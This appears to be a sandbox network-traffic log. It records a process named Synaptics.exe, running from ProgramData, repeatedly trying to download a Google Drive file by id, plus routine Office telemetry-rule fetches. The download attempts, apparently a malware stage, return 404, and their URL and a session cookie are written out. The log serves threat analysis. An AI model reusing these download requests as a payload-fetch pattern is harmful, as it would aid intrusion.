                                                                                        Date: Thu, 05 Dec 2024 21:50:22 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ngxVxqjkDhgeWSpBCwCnkg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        17 | 192.168.2.5 | 49758 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:23 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:23 GMT
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xpgmVQObIPSZ4RoQpbE11g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6OhGIlKkIe1QmVLK3cgHqgev68wC3dNRbW04LCORfKr5OEEq7ilqeXq6gVPivn3X9ua88Y3Lduxg
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:23 UTC | 137 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:23 UTC | 1390 | IN
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="yxY5SYo80Nf-C-slhUKmdg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:23 UTC | 125 | IN
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        18 | 192.168.2.5 | 49759 | 142.250.181.129 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:22 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Cache-Control: no-cache
                                                                                        Host: drive.usercontent.google.com
                                                                                        Connection: Keep-Alive
                                                                                        Cookie: NID=519=E2qOWQ5noWW8F60Fg6vQtwgyW2VEX3a759KV8GuVUalHhGuNG5nJt2mnliW_EIEctlonUtOkJ7269YI9zD81WZ2mWzRY3WQG982h6ijztVxt3jQYqg6EB0VChzrAFfkPH7PWdINLriHvYxY4IPw5kkYg4ofOUAdWixKZp50v_wqF6635qxanN2k
                                                                                        2024-12-05 21:50:23 UTC | 1253 | IN | HTTP/1.1 404 Not Found
                                                                                        Content-Type: text/html; charset=utf-8
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:23 GMT
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-fCOtNfxMBp12cRLlDfEk1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Length: 1652
                                                                                        X-GUploader-UploadID: AFiumC6Kf_LB2s2Ylt2SAi7tcnX7nQv_TUI35TL_j1Xo_ZighmQZ9wiSC8iw42zJl38_reYlbE5CNtUIGg
                                                                                        Server: UploadServer
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                        Connection: close
                                                                                        2024-12-05 21:50:23 UTC | 137 | IN
                                                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Err
                                                                                        2024-12-05 21:50:23 UTC | 1390 | IN
                                                                                        Data Ascii: or 404 (Not Found)!!1</title><style nonce="OpvS3h4Yem2aJRydwN-4dg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180
                                                                                        2024-12-05 21:50:23 UTC | 125 | IN
                                                                                        Data Ascii: .</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        19 | 192.168.2.5 | 49757 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:22 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:23 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:22 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-xNcT7nNulYf-63WAdZLz5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        20 | 192.168.2.5 | 49761 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:23 UTC | 192 | OUT | GET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 415
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                        ETag: "0x8DC582B9F6F3512"
                                                                                        x-ms-request-id: d3611829-901e-007b-22c2-45ac50000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdwt8wrhC1EWRu6rg00000003e000000000ezwc
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC | 415 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        21 | 192.168.2.5 | 49762 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:23 UTC | 192 | OUT | GET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 471
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                        ETag: "0x8DC582BB10C598B"
                                                                                        x-ms-request-id: c2908fd4-501e-00a0-4ac8-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdhk6hphC1EWRaw3c000000030g00000000mhs1
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC | 471 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        22 | 192.168.2.5 | 49760 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:23 UTC | 192 | OUT | GET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 474
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                        ETag: "0x8DC582B9964B277"
                                                                                        x-ms-request-id: 4628c04c-d01e-0017-18cc-45b035000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdnq7x2hC1EWRpxr000000003600000000078fn
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC | 474 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        23 | 192.168.2.5 | 49763 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:23 UTC | 192 | OUT | GET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 632
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                        ETag: "0x8DC582BB6E3779E"
                                                                                        x-ms-request-id: 4a622c55-e01e-0099-7fc1-45da8a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdkw94lhC1EWRxuz400000003ag000000010u6z
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC | 632 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        24 | 192.168.2.5 | 49764 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:23 UTC | 192 | OUT | GET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:24 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:24 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 467
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                        ETag: "0x8DC582BA6C038BC"
                                                                                        x-ms-request-id: dbf49064-101e-00a2-1bc6-459f2e000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215024Z-1746fd949bdjrnwqhC1EWRpg2800000003f00000000006m3
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:24 UTC | 467 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        25 | 192.168.2.5 | 49771 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:25 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce--2Eu-v9VzT5f4ql9IxW-kA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                        26 | 192.168.2.5 | 49772 | 172.217.19.238 | 443 | 2180 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                        User-Agent: Synaptics.exe
                                                                                        Host: docs.google.com
                                                                                        Cache-Control: no-cache
                                                                                        2024-12-05 21:50:26 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                        Content-Type: application/binary
                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                        Pragma: no-cache
                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-ursibVWuMQkHT_x2PrQ3vw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        Server: ESF
                                                                                        Content-Length: 0
                                                                                        X-XSS-Protection: 0
                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        27 | 192.168.2.5 | 49776 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 192 | OUT | GET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                        ETag: "0x8DC582BB344914B"
                                                                                        x-ms-request-id: c2a94a43-501e-00a0-7dd0-459d9f000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdqpttnhC1EWRe1wg00000002xg00000000xyrr
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC | 486 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        28 | 192.168.2.5 | 49775 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 192 | OUT | GET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 407
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                        ETag: "0x8DC582BBAD04B7B"
                                                                                        x-ms-request-id: 2b878731-501e-008c-34ce-45cd39000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdhk6hphC1EWRaw3c000000031g00000000fz4k
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC | 407 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        29 | 192.168.2.5 | 49777 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 192 | OUT | GET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 427
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                        ETag: "0x8DC582BA310DA18"
                                                                                        x-ms-request-id: 6818e2c2-d01e-0065-16d2-45b77a000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bddtfvqhC1EWRxbpg000000034000000000w94q
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC | 427 | IN
                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                        30 | 192.168.2.5 | 49778 | 13.107.246.63 | 443
                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                        2024-12-05 21:50:25 UTC | 192 | OUT | GET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                        Connection: Keep-Alive
                                                                                        Accept-Encoding: gzip
                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                        Host: otelrules.azureedge.net
                                                                                        2024-12-05 21:50:26 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                        Date: Thu, 05 Dec 2024 21:50:26 GMT
                                                                                        Content-Type: text/xml
                                                                                        Content-Length: 486
                                                                                        Connection: close
                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                        ETag: "0x8DC582B9018290B"
                                                                                        x-ms-request-id: 6223bc78-401e-0015-38b6-450e8d000000
                                                                                        x-ms-version: 2018-03-28
                                                                                        x-azure-ref: 20241205T215026Z-1746fd949bdb8xvchC1EWRmbd400000003a0000000004ad0
                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                        X-Cache: TCP_HIT
                                                                                        Accept-Ranges: bytes
                                                                                        2024-12-05 21:50:26 UTC | 486 | IN
